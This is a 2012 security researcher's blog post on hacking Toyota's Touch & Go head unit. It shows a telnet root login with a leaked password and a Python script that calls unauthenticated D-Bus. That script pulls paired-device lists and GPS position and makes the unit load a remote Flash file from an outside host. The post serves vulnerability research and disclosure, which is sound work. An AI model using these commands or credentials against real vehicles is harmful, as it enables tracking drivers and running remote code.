Did you know that you can navigate the posts by swiping left and right?

Hacking Toyota touch and go

05 Mar 2012 . category: Hacking .
#hacking #reverseengineering #vulnerability

Toyota Touch & Go

Raw notes

Intro

New Toyotas has head unit called touch and go. System is based on QNX and made by Harman and most likely same kind of devices are used also by other car manufacturers. You can connect car to the Internet via Bluetooth. We joined to same Bluetooth network to see what was going on.

There was multiple services running on QNX, including Telnet, anonymous login enabled D-Bus and some log interfaces for debugging.

Telnet

$ telnet 172.20.10.6
Trying 172.20.10.6...
Connected to 172.20.10.6.
Escape character is '^]'.


QNX Neutrino (localhost) (ttyp0)

login:

Accounts are now publicly known. Harman were kind to share account information to everybody on their scrum wiki.

login: root
password: Mc!AsR3

D-Bus

D-Bus is used for the internal communication of the device. Because QNS does not support Unix Domain Socket, developer decided to use TCP –socket. Back in the days he was thinking that this device is not going to be on the Internet and decided to use it on anonymous mode. That means that you do not have to do any authentication to use it remotely.

We made simple script for the testing purposes. Here is couple of examples:

import sys
import dbus

def main(service, method, args):
    bus = dbus.bus.BusConnection("tcp:host=192.168.2.3,port=6667")
    p = bus.get_object(service, "/" + service.replace(".", "/"))
    i = dbus.Interface(p, dbus_interface="com.harman.ServiceIpc")
    print "calling %s(%s)" % (method, args)
    print i.Invoke(method, args)

if __name__ == "__main__":
    main(*sys.argv[1:])

Using that we were able to:

1. Get list of paired Bluetooth devices

machine% python toyota.py com.harman.service.BluetoothService getPairedDeviceList ''
{"pairedDeviceList":[{"serviceSearchList":[{"service":"A2DP_SOURCE","priority":0,"connected":false},{"service":"HFPGW","priority":1,"connected":true},{"service":"HSPGW","priority":0,"connected":false},{"service":"0000-1203-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"PAN_NAP","priority":0,"connected":true},{"service":"AVRCP","priority":0,"connected":false},{"service":"SPP","priority":0,"connected":false},{"service":"PAN_GN","priority":0,"connected":false},{"service":"SDP","priority":0,"connected":false}],"name":"cn0011","address":"xx:xx:xx:xx:xx:xx"},{"serviceSearchList":[{"service":"HFPGW","priority":2,"connected":false},{"service":"A2DP_SOURCE","priority":0,"connected":false},{"service":"DID","priority":0,"connected":false},{"service":"AVRCP","priority":0,"connected":false},{"service":"0000-1203-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"HSPGW","priority":0,"connected":false},{"service":"OPP_SERVER","priority":0,"connected":false},{"service":"PBAP_SERVER","priority":0,"connected":false},{"service":"SDP","priority":0,"connected":false}],"name":"ZTE-BLADE","address":"xx:xx:xx:xx:xx:xx"},{"serviceSearchList":[{"service":"HFPGW","priority":3,"connected":false},{"service":"A2DP_SOURCE","priority":0,"connected":false},{"service":"PAN_NAP","priority":0,"connected":false},{"service":"OPP_SERVER","priority":0,"connected":false},{"service":"FTP","priority":0,"connected":false},{"service":"DUNGW","priority":0,"connected":false},{"service":"0000-1201-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"SPP","priority":0,"connected":false},{"service":"0000-1203-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"HSPGW","priority":0,"connected":false},{"service":"SyncMLClient","priority":0,"connected":false},{"service":"PBAP_SERVER","priority":0,"connected":false},{"service":"SAP","priority":0,"connected":false},{"service":"0000-1204-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"AVRCP","priority":0,"connected":false},{"service":"SDP","priority":0,"connected":false},{"service":"FBUS_RFCOMM","priority":0,"connected":false}],"name":"Nokia X3-02","address":"xx:xx:xx:xx:xx:xx"}],"description":"success","code":0}

2. Get car GPS-position:

machine% python toyota-cmd.py com.harman.service.Navigation MAP_PositionInfo ''
calling MAP_PositionInfo()
{"lat":65.06096196174622,"lon":25.44586372375488,"posInfo":null}

3. Load any flash (swf) application from Internet:

machine% python toyota-cmd.py com.harman.service.HMIService loadExternalSWF '{ "path":"http://www.sieni.us/H4X/29.swf" }'
calling loadExternalSWF({ "path":"http://www.sieni.us/H4X/29.swf" })
{"result":true}

Here is first success with loadExternalSWF.

I was so exited about the success that I stopped recording by mistake. :)

We reported this vulnerability to Toyota and they thought it is not a problem because you need to use Bluetooth to get in the system.

Edit (2015) Same vulnerability was used in famous Jeep hack. It seems it really was a problem.

Go and check our raw notes from the wiki if you are interested about the dirty details. Raw notes

Me

Feel free to contact me for more info or just to give feedback. e-mail: mikko.kenttala(ä)gmail.com IRC: turmio@IRCnet